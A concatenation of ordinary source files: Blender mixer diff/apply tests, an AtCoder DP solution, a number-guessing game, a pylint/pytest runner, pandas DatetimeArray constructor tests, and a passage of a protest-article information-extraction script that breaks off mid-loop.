| bo-lim/Class_Scheduler | worker.py | worker.py | py | 850 | python | en | code | 0 | github-code | 90 |
416925619 | from pathlib import Path
import unittest
import bpy
from mixer.blender_data.bpy_data_proxy import BpyDataProxy
from mixer.blender_data.datablock_proxy import DatablockProxy
from mixer.blender_data.diff import BpyBlendDiff
from mixer.blender_data.filter import test_properties
class DifferentialApply(unittest.TestCase):
    """Base fixture: open an empty .blend and build a proxy of the Scene."""

    def setUp(self):
        # Always start from the pristine empty.blend next to this test file.
        this_folder = Path(__file__).parent
        test_blend_file = str(this_folder / "empty.blend")
        file = test_blend_file
        bpy.ops.wm.open_mainfile(filepath=file)
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
        self.scene = bpy.data.scenes["Scene"]
        self.scenes_property = bpy.data.bl_rna.properties["scenes"]

    def generate_all_uuids(self):
        # as a side effect, BpyBlendDiff generates the uuids
        _ = BpyBlendDiff()
        _.diff(self.proxy, test_properties)
class Datablock(DifferentialApply):
    """Diff/apply round trips for plain (builtin-typed) datablock members."""

    def test_builtin(self):
        # a python builtin in a datablock
        # Scene.audio_volume
        # test_diff_apply.Datablock.test_builtin
        self.scene.audio_volume = 0.5
        delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # the diff has audio_volume, updated to 0.5
        # rollback to anything else
        self.scene.audio_volume = 0.0
        # apply the diff
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
        self.assertEqual(self.scene.audio_volume, 0.5)

    def test_struct_builtin(self):
        # a python builtin in a struct inside a datablock
        # Scene.eevee.use_bloom
        # test_diff_apply.Datablock.test_struct_builtin
        self.scene.eevee.use_bloom = False
        # Reload the proxy so it captures use_bloom == False as the baseline.
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
        self.scene.eevee.use_bloom = True
        delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # diff is -> True
        # reset
        self.scene.eevee.use_bloom = False
        # apply the diff
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
        self.assertEqual(self.scene.eevee.use_bloom, True)
class StructDatablockRef(DifferentialApply):
    # datablock reference in a struct
    # Scene.world
    """Diff/apply round trips for a datablock reference held by a struct."""

    def test_add(self):
        # set reference from None to a valid datablock
        # test_diff_apply.StructDatablockRef.test_add
        # create first so that is is correctly registered (bpt_data.diff would register it, not scene_proxy.diff)
        world = bpy.data.worlds.new("W")
        self.scene.world = None
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        # Loaded proxy contains scene.world = None
        self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
        self.scene.world = world
        self.generate_all_uuids()
        delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # Diff contains set scene.proxy to world
        self.scene.world = None
        # apply the diff
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
        self.assertEqual(self.scene.world, world)

    def test_update(self):
        # set reference from one valid datablock to another
        # test_diff_apply.StructDatablockRef.test_update
        world1 = bpy.data.worlds.new("W1")
        world2 = bpy.data.worlds.new("W2")
        self.scene.world = world1
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
        self.scene.world = world2
        self.generate_all_uuids()
        delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # diff -> world2
        # reset
        self.scene.world = world1
        # apply the diff
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
        self.assertEqual(self.scene.world, world2)

    def test_remove(self):
        # apply sets reference from a valid datablock to None
        # test_diff_apply.StructDatablockRef.test_remove
        world = bpy.data.worlds.new("W")
        self.scene.world = world
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        # Loaded proxy contains scene.world = world
        self.scene_proxy: DatablockProxy = self.proxy.data("scenes").search_one("Scene")
        self.scene.world = None
        self.generate_all_uuids()
        delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # Delta contains set scene.proxy to none
        self.scene.world = world
        # apply the diff
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, delta, self.proxy.context())
        self.assertEqual(self.scene.world, None)
class Collection(DifferentialApply):
    # test_differential.Collection
    """Diff/apply round trips for collection-typed members."""

    def test_datablock_collection(self):
        # Scene.collection.objects
        # A collection of references to standalone datablocks
        # tests DatablockCollectionProxy.apply()
        # test_diff_apply.Collection.test_datablock_collection
        for i in range(2):
            empty = bpy.data.objects.new(f"Unchanged{i}", None)
            self.scene.collection.objects.link(empty)
        for i in range(2):
            empty = bpy.data.objects.new(f"Deleted{i}", None)
            self.scene.collection.objects.link(empty)
        # Snapshot the proxy with Unchanged*/Deleted* linked as the baseline.
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        self.scene_proxy = self.proxy.data("scenes").search_one("Scene")
        self.scene = bpy.data.scenes["Scene"]
        for i in range(2):
            empty = bpy.data.objects.new(f"Added{i}", None)
            self.scene.collection.objects.link(empty)
        for i in range(2):
            empty = bpy.data.objects[f"Deleted{i}"]
            self.scene.collection.objects.unlink(empty)
        self.generate_all_uuids()
        scene_delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # delta contains(deleted1, deleted 2, added1, added2)
        # reset
        for i in range(2):
            empty = bpy.data.objects[f"Deleted{i}"]
            self.scene.collection.objects.link(empty)
        for i in range(2):
            empty = bpy.data.objects[f"Added{i}"]
            self.scene.collection.objects.unlink(empty)
        # required because the Added{i} were created after proxy load and are not known by the proxy
        # at this time. IRL the depsgraph handler uses BpyBendDiff to find datablock additions,
        # then BpyDataProxy.update()
        self.proxy.load(test_properties)
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, scene_delta, self.proxy.context())
        self.assertIn("Unchanged0", self.scene.collection.objects)
        self.assertIn("Unchanged1", self.scene.collection.objects)
        self.assertIn("Added0", self.scene.collection.objects)
        self.assertIn("Added1", self.scene.collection.objects)
        self.assertNotIn("Deleted0", self.scene.collection.objects)
        self.assertNotIn("Deleted1", self.scene.collection.objects)

    def test_key_str(self):
        # Scene.render.views
        # A bpy_prop_collection with string keys
        # tests StructCollectionProxy.apply()
        # test_diff_apply.Collection.test_key_str
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        self.scene_proxy = self.proxy.data("scenes").search_one("Scene")
        self.scene = bpy.data.scenes["Scene"]
        view_right = self.scene.render.views["right"]
        self.scene.render.views.remove(view_right)
        view = self.scene.render.views.new("New")
        view = self.scene.render.views["left"]
        view_left_suffix_bak = view.file_suffix
        view.file_suffix = "new_suffix"
        self.generate_all_uuids()
        scene_delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # reset to initial state
        views = bpy.data.scenes["Scene"].render.views
        view_right = views.new("right")
        views["left"].file_suffix = view_left_suffix_bak
        view_new = views["New"]
        views.remove(view_new)
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, scene_delta, self.proxy.context())
        self.assertIn("New", views)
        self.assertIn("left", views)
        self.assertEqual(views["left"].file_suffix, "new_suffix")
        self.assertNotIn("right", views)

    @unittest.skip("Not implemented: addition in array")
    def test_key_int(self):
        # Scene.view_settings.curve_mapping.curves
        # A bpy_prop_collection with int keys
        # test_diff_apply.Collection.test_key_int
        self.scene.view_settings.use_curve_mapping = True
        points0 = self.scene.view_settings.curve_mapping.curves[0].points
        points0.new(0.5, 0.5)
        points1 = self.scene.view_settings.curve_mapping.curves[1].points
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        self.scene_proxy = self.proxy.data("scenes").search_one("Scene")
        self.scene = bpy.data.scenes["Scene"]
        points0.remove(points0[1])
        points1.new(2.0, 2.0)
        self.generate_all_uuids()
        scene_delta = self.scene_proxy.diff(self.scene, self.scene.name, self.scenes_property, self.proxy.context())
        # the delta contains :
        # curves[0]: Deletion of element 1
        # curves[1]: Addition of element 2
        # reset state
        points0.new(0.5, 0.5)
        points1.remove(points1[2])
        scene = bpy.data.scenes[self.scene.name]
        self.scene_proxy.apply(scene, bpy.data.scenes, self.scene.name, scene_delta, self.proxy.context())
        self.assertEqual(len(points0), 2)
        self.assertEqual(list(points0[0].location), [0.0, 0.0])
        self.assertEqual(list(points0[1].location), [1.0, 1.0])
        self.assertEqual(len(points1), 3)
        self.assertEqual(list(points1[0].location), [0.0, 0.0])
        self.assertEqual(list(points1[1].location), [1.0, 1.0])
        self.assertEqual(list(points1[2].location), [2.0, 2.0])
class Aos(DifferentialApply):
    # test_diff_compute.Aos
    # @unittest.skip("AttributeError: 'CollectionObjects' object has no attribute 'fixed_type'")
    """Diff/apply round trip for array-of-struct data (mesh vertex coords)."""

    def test_modify_value(self):
        # modify a vertex coordinate in a mesh
        # test_diff_apply.Aos.test_modify_value
        mesh = bpy.data.meshes.new("Mesh")
        mesh.vertices.add(4)
        for i in [0, 1, 2, 3]:
            v = 10 * i
            mesh.vertices[i].co = [v, v + 1, v + 2]
        # Expected final state: the original coordinates, restored by apply().
        expected_vertices = [list(vertex.co) for vertex in mesh.vertices]
        self.proxy = BpyDataProxy()
        self.proxy.load(test_properties)
        mesh_proxy = self.proxy.data("meshes").search_one("Mesh")
        mesh = bpy.data.meshes["Mesh"]
        modified_vertex = (-1.0, -2.0, -3.0)
        mesh.vertices[0].co = modified_vertex
        self.generate_all_uuids()
        mesh_delta = mesh_proxy.diff(mesh, mesh.name, None, self.proxy.context())
        # reset mesh state
        mesh.vertices[0].co = (0.0, 1.0, 2.0)
        mesh_proxy.apply(bpy.data.meshes[mesh.name], bpy.data.meshes, mesh.name, mesh_delta, self.proxy.context())
        vertices = [list(vertex.co) for vertex in mesh.vertices]
        self.assertEqual(vertices, expected_vertices)
| ubisoft/mixer | mixer/blender_data/tests/test_diff_apply.py | test_diff_apply.py | py | 12,254 | python | en | code | 1,311 | github-code | 90 |
18511240209 | from pprint import pprint
def main():
    """Read the contest input and print the minimum number of solved problems
    needed to reach a total score of at least G.

    Input format: first line "D G"; then D lines "p_i c_i" where difficulty i
    has p_i problems worth 100*i each plus a full-clear bonus c_i.
    """
    D, G = map(int, input().split())
    p, c = [0] * D, [0] * D
    for i in range(D):
        p[i], c[i] = map(int, input().split())
    qnum = sum(p)
    # dp[i][j] := best score using only the first i difficulties, solving j problems
    dp = [[0] * (qnum + 1) for _ in range(D + 1)]
    ans = qnum
    for i in range(1, D + 1):
        for j in range(qnum + 1):
            for k in range(min(p[i - 1] + 1, j + 1)):
                # solve k problems of difficulty i; full clear (k == p[i-1]) adds bonus c
                bonus = c[i - 1] if k == p[i - 1] else 0
                dp[i][j] = max(dp[i][j], dp[i - 1][j - k] + 100 * i * k + bonus)
            if dp[i][j] >= G:
                ans = min(ans, j)
    # plain print is the right tool for a scalar; pprint is for nested data
    print(ans)


if __name__ == "__main__":
    main()
| Aasthaengg/IBMdataset | Python_codes/p03290/s924866554.py | s924866554.py | py | 835 | python | en | code | 0 | github-code | 90 |
39762692126 | import random
def humanguess():
    """Interactive game: the human guesses a secret number in [0, 10).

    Gives higher/lower feedback after every wrong guess and announces the win.
    """
    number = random.randrange(0, 10)
    # NOTE(review): the prompt says "del 0 al 10" but randrange(0, 10) never
    # produces 10 — confirm whether the upper bound should be inclusive.
    respuesta = int(input("Dame un numero del 0 al 10: "))
    while number != respuesta:
        # BUG FIXES vs original: do not print the secret number up front, give
        # feedback on EVERY wrong guess (the first guess used to get none),
        # and always announce the win (a correct first guess used to exit silently).
        if respuesta > number:
            print(f"Te pasaste {respuesta}")
        else:
            print(f"Aun te falta {respuesta}")
        respuesta = int(input("Dame un numero del 0 al 10: "))
    print(f"Ganaste el numero era {number}")
def computerGuess():
    """Interactive game: the computer finds the user's number in [0, 1000).

    The user answers "si"/"no" to each guess and "mayor"/"menor" to narrow
    the interval; the computer bisects instead of guessing randomly.
    """
    minimo = 0
    maximo = 1000
    number = random.randrange(minimo, maximo)
    while True:
        print(number)
        respuesta = input("Este es tu numero si , no: ").lower()
        if respuesta != "no":
            print("Numero")
            return
        opc = input("Es mayor o menor: ").lower()
        if opc == "menor":
            # Target is strictly below the current guess.
            maximo = number
        else:
            # Target is strictly above the current guess, so exclude it
            # (the original kept the rejected guess as a candidate).
            minimo = number + 1
        if minimo >= maximo:
            # Contradictory answers emptied the interval; the original crashed
            # here with ValueError from randrange on an empty range. Restart.
            minimo, maximo = 0, 1000
        # Bisect: O(log n) questions and never repeats a rejected guess.
        number = (minimo + maximo) // 2


computerGuess()
3175221947 | import sys
import subprocess
import glob2
def run_command(_command, _output):
    """Run *_command*, mirroring its combined stdout/stderr both to the
    console and to *_output*; terminate the process via sys.exit on failure.

    Args:
        _command: argv list passed to subprocess.Popen (shell is never used).
        _output: writable text file-like object receiving a copy of the log.

    Raises:
        SystemExit: with the child's return code when it exits non-zero.
    """
    header = "Run command: " + " ".join(_command)
    print(header)
    _output.write(header + "\n")
    with subprocess.Popen(
        _command,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        shell=False
    ) as _proc:
        # Stream output line by line until EOF. This replaces the original
        # busy-poll loop (repeated poll() + readline), which wasted CPU,
        # could leave `_line` unbound when the process exited instantly,
        # and ended with an unreachable sys.exit after the `return`.
        for _raw in _proc.stdout:
            _line = _raw.decode("utf-8", errors="replace").strip()
            print(_line)
            _output.write(_line + "\n")
        _returncode = _proc.wait()
    if _returncode != 0:
        print("ERROR: returncode " + str(_returncode))
        _output.write("ERROR: returncode " + str(_returncode) + "\n")
        sys.exit(_returncode)
if __name__ == "__main__":
    # Collect pylint + pytest output into result_tests.txt; any failing step
    # terminates the script via sys.exit inside run_command.
    with open('result_tests.txt', 'w') as _output:
        try:
            command = [
                'python3', '-m', 'pylint',
                '--rcfile=.pylintrc',
            ]
            # Lint every top-level Python file in the working directory.
            command.extend(glob2.glob("*.py"))
            run_command(command, _output)
            run_command([
                'python3', '-m', 'pytest',
                '-rAs', '-c', 'env-travis.ini'
            ], _output)
            print('\n\n\nlook result_tests.txt')
        finally:
            print("finally")
| freehackquest/fhq-server | tests/server-api-tests/run_tests.py | run_tests.py | py | 1,703 | python | en | code | 35 | github-code | 90 |
34870649900 | import numpy as np
import pytest
from pandas._libs import iNaT
from pandas.core.dtypes.dtypes import DatetimeTZDtype
import pandas as pd
import pandas._testing as tm
from pandas.core.arrays import DatetimeArray
class TestDatetimeArrayConstructor:
def test_from_sequence_invalid_type(self):
mi = pd.MultiIndex.from_product([np.arange(5), np.arange(5)])
with pytest.raises(TypeError, match="Cannot create a DatetimeArray"):
DatetimeArray._from_sequence(mi)
def test_only_1dim_accepted(self):
arr = np.array([0, 1, 2, 3], dtype="M8[h]").astype("M8[ns]")
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 3-dim, we allow 2D to sneak in for ops purposes GH#29853
DatetimeArray(arr.reshape(2, 2, 1))
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 0-dim
DatetimeArray(arr[[0]].squeeze())
def test_freq_validation(self):
# GH#24623 check that invalid instances cannot be created with the
# public constructor
arr = np.arange(5, dtype=np.int64) * 3600 * 10**9
msg = (
"Inferred frequency h from passed values does not "
"conform to passed frequency W-SUN"
)
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr, freq="W")
@pytest.mark.parametrize(
"meth",
[
DatetimeArray._from_sequence,
pd.to_datetime,
pd.DatetimeIndex,
],
)
def test_mixing_naive_tzaware_raises(self, meth):
# GH#24569
arr = np.array([pd.Timestamp("2000"), pd.Timestamp("2000", tz="CET")])
msg = (
"Cannot mix tz-aware with tz-naive values|"
"Tz-aware datetime.datetime cannot be converted "
"to datetime64 unless utc=True"
)
for obj in [arr, arr[::-1]]:
# check that we raise regardless of whether naive is found
# before aware or vice-versa
with pytest.raises(ValueError, match=msg):
meth(obj)
def test_from_pandas_array(self):
arr = pd.array(np.arange(5, dtype=np.int64)) * 3600 * 10**9
result = DatetimeArray._from_sequence(arr)._with_freq("infer")
expected = pd.date_range("1970-01-01", periods=5, freq="h")._data
tm.assert_datetime_array_equal(result, expected)
def test_mismatched_timezone_raises(self):
arr = DatetimeArray(
np.array(["2000-01-01T06:00:00"], dtype="M8[ns]"),
dtype=DatetimeTZDtype(tz="US/Central"),
)
dtype = DatetimeTZDtype(tz="US/Eastern")
msg = r"dtype=datetime64\[ns.*\] does not match data dtype datetime64\[ns.*\]"
with pytest.raises(TypeError, match=msg):
DatetimeArray(arr, dtype=dtype)
# also with mismatched tzawareness
with pytest.raises(TypeError, match=msg):
DatetimeArray(arr, dtype=np.dtype("M8[ns]"))
with pytest.raises(TypeError, match=msg):
DatetimeArray(arr.tz_localize(None), dtype=arr.dtype)
def test_non_array_raises(self):
with pytest.raises(ValueError, match="list"):
DatetimeArray([1, 2, 3])
def test_bool_dtype_raises(self):
arr = np.array([1, 2, 3], dtype="bool")
msg = "Unexpected value for 'dtype': 'bool'. Must be"
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr)
msg = r"dtype bool cannot be converted to datetime64\[ns\]"
with pytest.raises(TypeError, match=msg):
DatetimeArray._from_sequence(arr)
with pytest.raises(TypeError, match=msg):
pd.DatetimeIndex(arr)
with pytest.raises(TypeError, match=msg):
pd.to_datetime(arr)
    def test_incorrect_dtype_raises(self):
        # dtype must be a supported datetime dtype; categorical, timedelta
        # and day-resolution datetime dtypes are all rejected.
        with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
            DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="category")
        with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
            DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="m8[s]")
        with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
            DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="M8[D]")
    def test_mismatched_values_dtype_units(self):
        # Values stored at second resolution cannot be wrapped with a
        # nanosecond dtype, whether naive or tz-aware.
        arr = np.array([1, 2, 3], dtype="M8[s]")
        dtype = np.dtype("M8[ns]")
        msg = "Values resolution does not match dtype."
        with pytest.raises(ValueError, match=msg):
            DatetimeArray(arr, dtype=dtype)
        dtype2 = DatetimeTZDtype(tz="UTC", unit="ns")
        with pytest.raises(ValueError, match=msg):
            DatetimeArray(arr, dtype=dtype2)
    def test_freq_infer_raises(self):
        # freq="infer" is not accepted by the fastpath constructor.
        with pytest.raises(ValueError, match="Frequency inference"):
            DatetimeArray(np.array([1, 2, 3], dtype="i8"), freq="infer")
    def test_copy(self):
        # copy=False must reuse the caller's buffer; copy=True must not.
        data = np.array([1, 2, 3], dtype="M8[ns]")
        arr = DatetimeArray(data, copy=False)
        assert arr._ndarray is data
        arr = DatetimeArray(data, copy=True)
        assert arr._ndarray is not data
@pytest.mark.parametrize("unit", ["s", "ms", "us", "ns"])
def test_numpy_datetime_unit(self, unit):
data = np.array([1, 2, 3], dtype=f"M8[{unit}]")
arr = DatetimeArray(data)
assert arr.unit == unit
assert arr[0].unit == unit
class TestSequenceToDT64NS:
    """Tests for the DatetimeArray._from_sequence conversion path."""
    def test_tz_dtype_mismatch_raises(self):
        # Already tz-aware data cannot be re-localized via a different tz dtype.
        arr = DatetimeArray._from_sequence(
            ["2000"], dtype=DatetimeTZDtype(tz="US/Central")
        )
        with pytest.raises(TypeError, match="data is already tz-aware"):
            DatetimeArray._from_sequence(arr, dtype=DatetimeTZDtype(tz="UTC"))
    def test_tz_dtype_matches(self):
        # Passing the matching tz dtype is a no-op round-trip.
        dtype = DatetimeTZDtype(tz="US/Central")
        arr = DatetimeArray._from_sequence(["2000"], dtype=dtype)
        result = DatetimeArray._from_sequence(arr, dtype=dtype)
        tm.assert_equal(arr, result)
    @pytest.mark.parametrize("order", ["F", "C"])
    def test_2d(self, order):
        # 2D object arrays (both memory orders) convert like their raveled form.
        dti = pd.date_range("2016-01-01", periods=6, tz="US/Pacific")
        arr = np.array(dti, dtype=object).reshape(3, 2)
        if order == "F":
            arr = arr.T
        res = DatetimeArray._from_sequence(arr)
        expected = DatetimeArray._from_sequence(arr.ravel()).reshape(arr.shape)
        tm.assert_datetime_array_equal(res, expected)
# ----------------------------------------------------------------------------
# Arrow interaction
# Shared parametrization data: i8 values at/near the int64 extremes plus nulls,
# and values that cast between fine and coarse resolutions without loss.
EXTREME_VALUES = [0, 123456789, None, iNaT, 2**63 - 1, -(2**63) + 1]
FINE_TO_COARSE_SAFE = [123_000_000_000, None, -123_000_000_000]
COARSE_TO_FINE_SAFE = [123, None, -123]
@pytest.mark.parametrize(
    ("pa_unit", "pd_unit", "pa_tz", "pd_tz", "data"),
    [
        ("s", "s", "UTC", "UTC", EXTREME_VALUES),
        ("ms", "ms", "UTC", "Europe/Berlin", EXTREME_VALUES),
        ("us", "us", "US/Eastern", "UTC", EXTREME_VALUES),
        ("ns", "ns", "US/Central", "Asia/Kolkata", EXTREME_VALUES),
        ("ns", "s", "UTC", "UTC", FINE_TO_COARSE_SAFE),
        ("us", "ms", "UTC", "Europe/Berlin", FINE_TO_COARSE_SAFE),
        ("ms", "us", "US/Eastern", "UTC", COARSE_TO_FINE_SAFE),
        ("s", "ns", "US/Central", "Asia/Kolkata", COARSE_TO_FINE_SAFE),
    ],
)
def test_from_arrow_with_different_units_and_timezones(pa_unit, pd_unit, pa_tz, pd_tz, data):
    # Name fixed: was the garbled
    # "test_from_arrowtest_from_arrow_with_different_units_and_timezones_with_".
    # __from_arrow__ must honor the requested pandas unit and timezone,
    # casting values across resolutions, for both plain and chunked arrays.
    pa = pytest.importorskip("pyarrow")
    pa_type = pa.timestamp(pa_unit, tz=pa_tz)
    arr = pa.array(data, type=pa_type)
    dtype = DatetimeTZDtype(unit=pd_unit, tz=pd_tz)
    result = dtype.__from_arrow__(arr)
    expected = DatetimeArray(
        np.array(data, dtype=f"datetime64[{pa_unit}]").astype(f"datetime64[{pd_unit}]"),
        dtype=dtype,
    )
    tm.assert_extension_array_equal(result, expected)
    result = dtype.__from_arrow__(pa.chunked_array([arr]))
    tm.assert_extension_array_equal(result, expected)
@pytest.mark.parametrize(
    ("unit", "tz"),
    [
        ("s", "UTC"),
        ("ms", "Europe/Berlin"),
        ("us", "US/Eastern"),
        ("ns", "Asia/Kolkata"),
        ("ns", "UTC"),
    ],
)
def test_from_arrow_from_empty(unit, tz):
    # An empty pyarrow array converts to an empty tz-aware DatetimeArray
    # with the requested unit, for both plain and chunked arrays.
    pa = pytest.importorskip("pyarrow")
    data = []
    arr = pa.array(data)
    dtype = DatetimeTZDtype(unit=unit, tz=tz)
    result = dtype.__from_arrow__(arr)
    expected = DatetimeArray(np.array(data, dtype=f"datetime64[{unit}]"))
    expected = expected.tz_localize(tz=tz)
    tm.assert_extension_array_equal(result, expected)
    result = dtype.__from_arrow__(pa.chunked_array([arr]))
    tm.assert_extension_array_equal(result, expected)
def test_from_arrow_from_integers():
    # Plain pyarrow int64 arrays are interpreted as nanosecond offsets
    # (iNaT maps to NaT) and localized to the dtype's timezone.
    pa = pytest.importorskip("pyarrow")
    data = [0, 123456789, None, 2**63 - 1, iNaT, -123456789]
    arr = pa.array(data)
    dtype = DatetimeTZDtype(unit="ns", tz="UTC")
    result = dtype.__from_arrow__(arr)
    expected = DatetimeArray(np.array(data, dtype="datetime64[ns]"))
    expected = expected.tz_localize("UTC")
    tm.assert_extension_array_equal(result, expected)
    result = dtype.__from_arrow__(pa.chunked_array([arr]))
    tm.assert_extension_array_equal(result, expected)
| pandas-dev/pandas | pandas/tests/arrays/datetimes/test_constructors.py | test_constructors.py | py | 9,234 | python | en | code | 40,398 | github-code | 90 |
from itertools import islice
import os
from os import listdir
from os.path import isfile, join
import re
import shutil
#path = '/home/neha/Desktop/ISI_final/test'
relationPath = '../../Data/Relations'
article_path='../../../2_Event_Filtering/Data/LDA_Filtered_Articles'
taggedArticlePath='../../Data/Tagged_Protest_Articles'
extracted_info_path = '../../Data/Extracted_information'
fileList=[]
window_size=7
# Create the output folder if not exists
if os.path.isdir(extracted_info_path):
shutil.rmtree(extracted_info_path)
os.makedirs(extracted_info_path)
########################################################################################################
#article_path='/home/neha/Desktop/info/article'
#get the published date of each article
articleList=[]
titleDict={}
published_date={}
for article in os.listdir(article_path):
articleList.append(article)
for article in articleList:
with open(os.path.join(article_path,article), 'rU') as fp:
for i, line in enumerate(fp):
if i == 2:
published_date[article]=line[:len(line)-2]
if i == 1:
titleDict[article]=line
###################################################################################################
def get_count(word_count_tuple):
    """Return the count half of a (word, count) pair -- used as a sort key."""
    count = word_count_tuple[1]
    return count
##########################################################################################################
def getRelID(relation):
    """Return the numeric id that prefixes a relation string, e.g. '12(...)' -> 12."""
    prefix = relation.partition('(')[0]
    return int(prefix)
############################################################################################################
def window(seq, n):
    "Returns a sliding window (of width n) over data from the iterable"
    " s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
    it = iter(seq)
    current = tuple(islice(it, n))
    # A sequence shorter than the window yields nothing at all.
    if len(current) < n:
        return
    yield current
    for nxt in it:
        # Slide by one: drop the oldest element, append the newest.
        current = current[1:] + (nxt,)
        yield current
yield result
if __name__=="__main__":
for filename in os.listdir(relationPath):
fileList.append(filename)
keywordList=['protest','protesting','protested','demonstartion','agitation','dharna','bandh','rally','rallies','gherao','activist','march towards','on strike']
tagList=['/PERSON','/LOCATION','/DATE','/ORGANIZTION','/person','/location','/date','/organization']
##############################################################################
#iterate over all the files
for filename in fileList:
print(filename)
print(titleDict[filename])
################################################################################################
#read file
with open(os.path.join(relationPath,filename), 'rU') as f:
dictPerson={}
dictLocation={}
dictOrganization={}
dictDate={}
relevanceDict={}
##################################################################################################
#parse the title
with open(os.path.join(taggedArticlePath,filename), 'rU') as fp:
i=0
for i, line in enumerate(fp):
if i==2:
#print line+'\n'
wordList=line.split(' ')
k=-1
for item in wordList:
k=k+1
if (k<len(wordList)) and ('/LOCATION' in wordList[k] or '/location' in wordList[k]):
if (k+1<len(wordList)) and ('/LOCATION' in wordList[k+1] or '/location' in wordList[k+1]):
first=wordList[k]
first=first[:-9]
second=wordList[k+1]
second=second[:-9]
location=first+" "+second
k=k+1
else:
location=wordList[k]
location=location[:-9]
if location not in dictLocation:
dictLocation[location.lower()]=1
if (k<len(wordList)) and ('/PERSON' in wordList[k] or '/person' in wordList[k]):
if (k+1<len(wordList)) and ('/person' in wordList[k+1] or '/person' in wordList[k+1]):
if (k+2<len(wordList)) and ('/person' in wordList[k+2] or '/person' in wordList[k+2]):
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
third=wordList[k+2]
third=third[:-7]
person=first+" "+second+" "+third
k=k+2
else:
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
person=first+" "+second
k=k+1
else:
person=wordList[k]
person=person[:-7]
if person not in dictPerson:
dictPerson[person.lower()]=1
if (k<len(wordList)) and ('/DATE' in wordList[k] or '/date' in wordList[k]):
if (k+1<len(wordList)) and ('/DATE' in wordList[k+1] or '/date' in wordList[k+1]):
first=wordList[k]
first=first[:-5]
second=wordList[k+1]
second=second[:-5]
date=first+" "+second
k=k+1
else:
date=wordList[k]
date=date[:-5]
if date not in dictDate:
dictDate[date.lower()]=1
if (k<len(wordList)) and ('/ORGANIZATION' in wordList[k] or '/oraganization' in wordList[k]):
if (k+1<len(wordList)) and ('/ORGANIZATION' in wordList[k+1] or '/organization' in wordList[k+1]):
first=wordList[k]
first=first[:-13]
second=wordList[k+1]
second=second[:-13]
organization=first+" "+second
k=k+1
else:
organization=wordList[k]
organization=organization[:-13]
if organization not in dictOrganization:
dictOrganization[organization.lower()]=1
##################################################################################################
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
#prevWindowProcessedFlag=[0,0,0,0,0]
##################################################################################################
#iterarte over window
for w in window(content,window_size):
#check for key phrase in each window and then check for the tags in each realtion extract info and mark relevant and processed
# currWindowProcessedFlag=[0,0,0,0,0]
stringWindow=str(w)
if any(keyword in stringWindow for keyword in keywordList):
####################################################################################################
#iterate over all the relation of the window
i=-1
relevanceFlag=0
for relation in w:
person=""
location=""
date=""
purpose=""
organization=""
flag=-1
relevanceFlag=0
i=i+1
stringRel=str(relation)
#relID=getRelID(stringRel)
stringRel=stringRel[:-1]
stringRel=re.sub(r'.*\(', '', stringRel)
#print stringRel
#set the flags and write relevence info into corresponding file
if any(tag in stringRel for tag in tagList):
#set relevance flag of this relation
if any(keyword in stringRel for keyword in keywordList):
relevanceFlag=1
#print 'found relevant'
#if not processed already process this time
#if prevWindowProcessedFlag[i] == 0:
#extract info
#extractInfo(stringRel)
###########################################################################################################
words=stringRel.split('#')
string=words[0]+" "+words[1]+" "+words[2]
wordList=string.split(' ')
k=-1
for item in wordList:
k=k+1
if (k<len(wordList)) and ('/LOCATION' in wordList[k] or '/location' in wordList[k]):
if (k+1<len(wordList)) and ('/LOCATION' in wordList[k+1] or '/location' in wordList[k+1]):
first=wordList[k]
first=first[:-9]
second=wordList[k+1]
second=second[:-9]
location=first+" "+second
k=k+1
else:
location=wordList[k]
location=location[:-9]
if location not in dictLocation:
dictLocation[location.lower()]=1
